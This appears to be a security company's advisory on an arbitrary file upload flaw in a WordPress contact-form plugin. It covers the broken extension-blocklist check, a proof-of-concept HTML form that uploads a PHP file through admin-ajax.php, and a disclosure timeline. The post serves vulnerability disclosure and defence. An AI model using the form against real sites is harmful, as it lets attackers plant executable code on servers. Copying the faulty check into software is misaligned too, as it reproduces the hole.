Login
19 Sep 2016

Arbitrary File Upload Vulnerability in N-Media Website Contact Form with File Upload

After discovering an arbitrary file upload vulnerability in the plugin N-Media Post Front-end Form recently, we took a look at other plugins from the same developer and found that three other shared same the same vulnerable code. One of those is N-Media Website Contact Form with File Upload.

In the case of this plugin, we found that we had already had a listing for a very similar looking vulnerability for the plugin already in our dataset. Our first thought was that we had mistakenly marked that one as being fixed when we added it to our data and the vulnerability had never been fixed, but a closer looked showed what had happened. After the previously issue was discovered the following code was added to restrict .php files being uploaded:

556
557
558
559
560
561
562
563
564
565
566
567

/* ========== Invalid File type checking ========== */
$file_type = wp_check_filetype($_FILES ['Filedata'] ['name'], null );
 
$allowed_types = array('php', 'exe');
//var_dump($allowed_types);
 
if( in_array($file_type['ext'], $allowed_types) ){
	$response ['status'] = 'error';
	$response ['message'] = __ ( 'File type not valid - '.$file_type, 'nm-filemanager' );
	die ( json_encode($response) );
}
/* ========== Invalid File type checking ========== */

At the time you had set the name of the file input to be uploaded as “Filedata” for the upload to work. The code above checks the input with that name for extensions that are not allowed. In version 1.9, the code was changed so the file input needs to be name “file” instead of “Filedata”, but the code checking the extension was not changed as well.

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/uploads/contact_files/ as upload.php.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Timeline

  • 7/16/2016 – Developer notified.
  • 7/16/2016 – Developer responds.
  • 9/19/2016 – WordPress.org Plugin Directory notified.
  • 9/21/2016 – Plugin removed from WordPress.org Plugin Directory.

No related posts.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published.